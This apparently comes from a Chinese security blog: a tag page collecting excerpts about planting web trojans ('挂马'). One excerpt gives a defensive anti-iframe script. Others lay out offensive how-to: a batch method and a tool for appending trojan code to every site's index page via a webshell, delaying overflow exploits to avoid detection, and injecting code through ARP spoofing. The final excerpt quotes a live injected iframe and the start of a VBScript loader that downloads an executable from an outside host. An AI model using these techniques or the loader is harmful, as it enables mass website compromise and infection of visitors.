标签 ‘挂马’ 下的日志
一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)
鬼仔注:上次发过 大家来投稿啦~~~ 之后,只接到几篇的投稿,不过有的是发过的,有的觉得不适合在这里发,所以一直没发,今天发的这篇是第一个。而且 sujean([email protected]) 告知我原来发过的一篇文章 如何杜绝iframe挂马 原作者应该是灵儿,所以我也将原来发过的那篇修改了下,加上了原作者。
感谢 sujean([email protected]) 的投递。
本文原创:[email protected] 请转载时保留版权信息
阅读全文 »
JS解决网站防挂IFRAME木马方案[如何杜绝iframe挂马]
鬼仔注:后续 http://huaidan.org/archives/1567.html
作者:灵儿
来源:cncert
最近公司和好朋友的网站纷纷被IFRAME了,有的挂上了鸽子,有的疯狂地弹窗,有的给人家增加流量。一个个文件去查找替换那些IFRAME代码,刚松口气,不久又加上去了,哎,什么世道!于是他们向我这个"JS高手"(他们强加给我的)求救,我也不能等闲视之,只好击键杀杀杀了。
因为FF(Firefox)不怕IFRAME,于是就拿IE开刀,不知道比尔有没有奖发。我只写了一句代码,就搞定了,哈,痛快。就是IE only(特有的)的CSS中的属性expression,插进去试试,果然那些IFRAME不起作用了。
代码如下:
阅读全文 »
批量挂马器
鬼仔注:丰子写的。
不过还有一种方法:
比如说d:\web\下面有N个站点,然后 dir /b /s d:\web\index.asp >1.txt
等下打开生成的1.txt
看到 d:\web\1\index.asp
d:\web\2\index.asp
d:\web\3\index.asp
这样的
然后将“d:\web\”全部替换为“echo 挂马的代码 >>d:\web\”
保存为BAT
在WEBSHELL上执行
下面看丰子写的这个吧,使用比较简单:
来源:丰初's Blog
C:\>MMbluestar.exe
MMBluestar Ver1.1 李丰初出品 2007年五月5号于公司
当前根目录是>>>C:\
使用方法MMBluestar.exe 路径 挂M的地址
阅读全文 »
挂溢出型网马的一个小技巧
文章作者:茄子宝
信息来源:邪恶八进制信息安全团队(www.eviloctal.com)
一直以来跨域脚本型网马比溢出型网马都要流行,究其原因就是溢出型网马会消耗大量的系统资源导致IE卡死甚至崩溃.
想一想如果一个溢出型网马挂在稍微有流量的站点,访问者一进入网站IE就假死,导致整个网站都不能正常访问,管理员也会在第一时间发现.
在以后层出不穷的IE漏洞中已经很难见到MS06014这种跨域脚本型网马,大部分IE漏洞包括0day都是溢出型网马.
我这里很早以前就有利用溢出型网马攻击网站的两个思路:
1.让溢出型网马的效果延时,也就是访问者进入网站后网马并不是马上起效,而是延时5秒至10秒执行.
这个思路在javascript中很好实现,直接用setTimeout对象,用setTimeout可以在未来的某个指定时间执行特定指令.
阅读全文 »
通过arp欺骗来直接挂马
信息来源:CN.Tink
文章作者:axis#ph4nt0m
目的:通过arp欺骗来直接挂马
优点:可以直接通过arp欺骗来挂马.
通常的arp欺骗的攻击方式是在同一vlan下,控制一台主机来监听密码,或者结合ssh中间人攻击来监听ssh1的密码
但这样存在局限性:1.管理员经常不登陆,那么要很久才能监听到密码
2.目标主机只开放了80端口,和一个管理端口,且80上只有静态页面,那么很难利用.而管理端口,如果是3389终端,或者是ssh2,那么非常难监听到密码.
优点:1.可以不用获得目标主机的权限就可以直接在上面挂马
2.非常隐蔽,不改动任何目标主机的页面或者是配置,在网络传输的过程中间直接插入挂马的语句.
3.可以最大化的利用arp欺骗,从而只要获取一台同一vlan下主机的控制权,就可以最大化战果.
阅读全文 »
落伍被挂马了
ps:在neeao和CN.Tink那里都看到了这个消息,我综合一下。估计是因为前两天DZ出的新洞被拿的,是一个叫freediscuz的论坛公布的漏洞,不过没有公布详细信息,只给了补丁。
Tags: 挂马, 落伍看了下首页,有这么句,
<iframe src=http://www.lynndent.com/cf/style.htm width=0 height=0></iframe>
然后打开了这个地址..
代码包含
<script language="VBScript">
on error resume next
my = "http://www.lynndent.com/cf/kkk.exe"
Set CAOc = document.createElement("object")
CAOc.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"